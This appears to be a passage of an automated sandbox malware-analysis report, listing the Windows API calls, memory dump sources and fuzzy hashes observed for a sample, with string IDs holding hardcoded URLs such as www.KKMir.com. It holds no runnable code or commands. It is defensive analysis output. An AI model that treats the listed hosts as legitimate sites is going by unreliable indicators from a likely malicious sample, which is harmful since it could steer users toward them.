                                                                                  • Instruction Fuzzy Hash: AC01B5716143106AEB20A73A9C43EAFB2F89FC0654F04E919B59997280EB74CC4C83A6
                                                                                  APIs
                                                                                  • __CreateFrameInfo.LIBCMT ref: 6A70DDBB
                                                                                    • Part of subcall function 6A7016CF: __getptd.LIBCMT ref: 6A7016DD
                                                                                    • Part of subcall function 6A7016CF: __getptd.LIBCMT ref: 6A7016EB
                                                                                  • __getptd.LIBCMT ref: 6A70DDC5
                                                                                    • Part of subcall function 6A705883: __getptd_noexit.LIBCMT ref: 6A705886
                                                                                    • Part of subcall function 6A705883: __amsg_exit.LIBCMT ref: 6A705893
                                                                                  • __getptd.LIBCMT ref: 6A70DDD3
                                                                                  • __getptd.LIBCMT ref: 6A70DDE1
                                                                                  • __getptd.LIBCMT ref: 6A70DDEC
                                                                                  • _CallCatchBlock2.LIBCMT ref: 6A70DE12
                                                                                    • Part of subcall function 6A701774: __CallSettingFrame@12.LIBCMT ref: 6A7017C0
                                                                                    • Part of subcall function 6A70DEB9: __getptd.LIBCMT ref: 6A70DEC8
                                                                                    • Part of subcall function 6A70DEB9: __getptd.LIBCMT ref: 6A70DED6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 1602911419-0
                                                                                  • Opcode ID: cfdfc672bf1df67f84d9c5ba2c089e1704c39ad13658e31cdcb6b867bde108d8
                                                                                  • Instruction ID: 1a43dea8face8049eeb082006b6f60c2c7cbbf4f4b1aca58a014b32cbfa1b8df
                                                                                  • Opcode Fuzzy Hash: cfdfc672bf1df67f84d9c5ba2c089e1704c39ad13658e31cdcb6b867bde108d8
                                                                                  • Instruction Fuzzy Hash: DE11B7B1D00209DFDB00DFA4D948BAEBBF1FB08318F118569E914A7252DF789A199B94
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 6A6F5976
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 6A6F598A
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 6A6F599A
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 6A6F59AC
                                                                                  • PtInRect.USER32(?,?,?), ref: 6A6F59BC
                                                                                  • GetWindow.USER32(?,00000005), ref: 6A6F59C9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                  • String ID:
                                                                                  • API String ID: 1315500227-0
                                                                                  • Opcode ID: 9ac2dbcd8e969eb6448bedb4db9a0fe5853e3851f18005a3b13ff3bef9b029c1
                                                                                  • Instruction ID: 2fa7109e08401d495850d748cdd5e44119694bc2a5b895807fc8d5e9d9b066a1
                                                                                  • Opcode Fuzzy Hash: 9ac2dbcd8e969eb6448bedb4db9a0fe5853e3851f18005a3b13ff3bef9b029c1
                                                                                  • Instruction Fuzzy Hash: 11018F32140156BBDF125F56CC09EEE3BAEEF42761F048521FD20E2040DB30DD028A95
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB4F00: CreateBrushIndirect.GDI32(?), ref: 0BEB4FAA
                                                                                  • UnrealizeObject.GDI32(00000000), ref: 0BEB5730
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5742
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0BEB5765
                                                                                  • SetBkMode.GDI32(?,00000002), ref: 0BEB5770
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0BEB578B
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0BEB5796
                                                                                    • Part of subcall function 0BEB4240: GetSysColor.USER32(8B0BEB55), ref: 0BEB424A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                  • String ID:
                                                                                  • API String ID: 3527656728-0
                                                                                  • Opcode ID: 98e90de359cb0ccb1b0dd77e225cb59e17153769991a3f86e28391e594e62632
                                                                                  • Instruction ID: 2894e91e0301060f036ca152bb4a2d77bacca118553fb8dbaac9d49f6148f056
                                                                                  • Opcode Fuzzy Hash: 98e90de359cb0ccb1b0dd77e225cb59e17153769991a3f86e28391e594e62632
                                                                                  • Instruction Fuzzy Hash: 61F062B5615105AFCF04FFB8F9C6E4B67A8AF043057446490BA08DF39BCA65EC189B39
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 6A6EDB17
                                                                                  • GetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6A6EDE9F), ref: 6A6EDB2F
                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 6A6EDB3F
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6A6EDE9F), ref: 6A6EDB4F
                                                                                  • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6A6EDE9F), ref: 6A6EDB56
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6A6EDE9F), ref: 6A6EDB5D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Time$BuffersCloseCreateDateFlushHandleLocal
                                                                                  • String ID:
                                                                                  • API String ID: 674073760-0
                                                                                  • Opcode ID: d3ece7259aa38a9240b5f19c8e2ed2e4a784bda58380403316271bee2a718884
                                                                                  • Instruction ID: 84852835f373f1c170158f5cc222f70e2d5640dcfbdda832ea55f51b780cd48c
                                                                                  • Opcode Fuzzy Hash: d3ece7259aa38a9240b5f19c8e2ed2e4a784bda58380403316271bee2a718884
                                                                                  • Instruction Fuzzy Hash: E5F068361002017BD7159B55CC4AFEB7BFCEBCD710F08452DF245E6080D774990A8BA5
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6E72DC
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  • _memset.LIBCMT ref: 6A6E72EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap_malloc_memset
                                                                                  • String ID: $$:rj$$:rj
                                                                                  • API String ID: 411814730-816229996
                                                                                  • Opcode ID: aed0a8df690a128783ed87807dcfcfda4541d8fd6fbc18ac4a09e1d69746e2c2
                                                                                  • Instruction ID: 86dc3f1c38a5ac23f18d86ea5574ae31ad3e471571b4dd0c62e5ad6400f42291
                                                                                  • Opcode Fuzzy Hash: aed0a8df690a128783ed87807dcfcfda4541d8fd6fbc18ac4a09e1d69746e2c2
                                                                                  • Instruction Fuzzy Hash: A8917971209341DFD340DF68C494A5BFBE4FF89714F058A4DE9A997292DB30E909CBA2
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
                                                                                  • API String ID: 2102423945-455206835
                                                                                  • Opcode ID: e8298e6407024731388fd4aca75106b513e6b8e0026d4358260a1fa803028d49
                                                                                  • Instruction ID: 16c029bbf6b9eabf06d038a810360d8f18a3184237b34f52ea6213f1bb8e5e34
                                                                                  • Opcode Fuzzy Hash: e8298e6407024731388fd4aca75106b513e6b8e0026d4358260a1fa803028d49
                                                                                  • Instruction Fuzzy Hash: E1913172D0020DAADB41CFE4C588BDEBBF9AF04344F128565ED18E6191EF78C646C794
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D731E
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                  • _memset.LIBCMT ref: 6A6D737D
                                                                                  • _memset.LIBCMT ref: 6A6D739A
                                                                                  • _memset.LIBCMT ref: 6A6D73B7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AddressHandleModuleProc
                                                                                  • String ID: http://www.A3M2.com
                                                                                  • API String ID: 1149923269-8747486
                                                                                  • Opcode ID: 56345cfe8f154dabbc9de2f13d298638ea6aaea2bef43cd9273a80b2b287e73b
                                                                                  • Instruction ID: 751bb916c78992786206315c79cb49d29f5bb6996387b2f78a6bcd48e921d403
                                                                                  • Opcode Fuzzy Hash: 56345cfe8f154dabbc9de2f13d298638ea6aaea2bef43cd9273a80b2b287e73b
                                                                                  • Instruction Fuzzy Hash: 8A3109F15083406BD320E664ED85FDB7BEC9F94348F454928EA98C6182FE70960C87E7
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D709E
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                  • _memset.LIBCMT ref: 6A6D70FD
                                                                                  • _memset.LIBCMT ref: 6A6D711A
                                                                                  • _memset.LIBCMT ref: 6A6D7137
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AddressHandleModuleProc
                                                                                  • String ID: http://www.ksfm2.com
                                                                                  • API String ID: 1149923269-2030630099
                                                                                  • Opcode ID: 55f62ef45a23171390da2226fc9ea0e0c8baef785287ab7b0d674c90053ff724
                                                                                  • Instruction ID: 54a8110e783492f85b169edc4ee99c257e41c3c5cc892ea17cd13b6743a74687
                                                                                  • Opcode Fuzzy Hash: 55f62ef45a23171390da2226fc9ea0e0c8baef785287ab7b0d674c90053ff724
                                                                                  • Instruction Fuzzy Hash: 2D31F7F2508340ABD220D764DD85FDB77ED9F94348F49092DEA9986182FE309A0C87E7
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D71DE
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                  • _memset.LIBCMT ref: 6A6D7243
                                                                                  • _memset.LIBCMT ref: 6A6D725A
                                                                                  • _memset.LIBCMT ref: 6A6D7277
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$AddressHandleModuleProc
                                                                                  • String ID: www.KKMir.com
                                                                                  • API String ID: 1149923269-1689476394
                                                                                  • Opcode ID: 011c4064268117f2d4e596577456b15d21286910d7a470d3a0dd9cdcc7e7916b
                                                                                  • Instruction ID: 97d3f688e9428bb4bce5d6607e890f4df29103bcdbf9c5f6874fcf4435803226
                                                                                  • Opcode Fuzzy Hash: 011c4064268117f2d4e596577456b15d21286910d7a470d3a0dd9cdcc7e7916b
                                                                                  • Instruction Fuzzy Hash: 5B31F7B25082846AD220D764ED85FDB77EC9F84348F45092DFA9D87282FE70960C86E7
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(00000000,00000000,0BEEF74D), ref: 0BEEF6CC
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0BEEF74D), ref: 0BEEF6EC
                                                                                  • ReleaseMutex.KERNEL32(?,00000000,0BEEF74D), ref: 0BEEF713
                                                                                  • CloseHandle.KERNEL32(?,?,00000000,0BEEF74D), ref: 0BEEF71E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
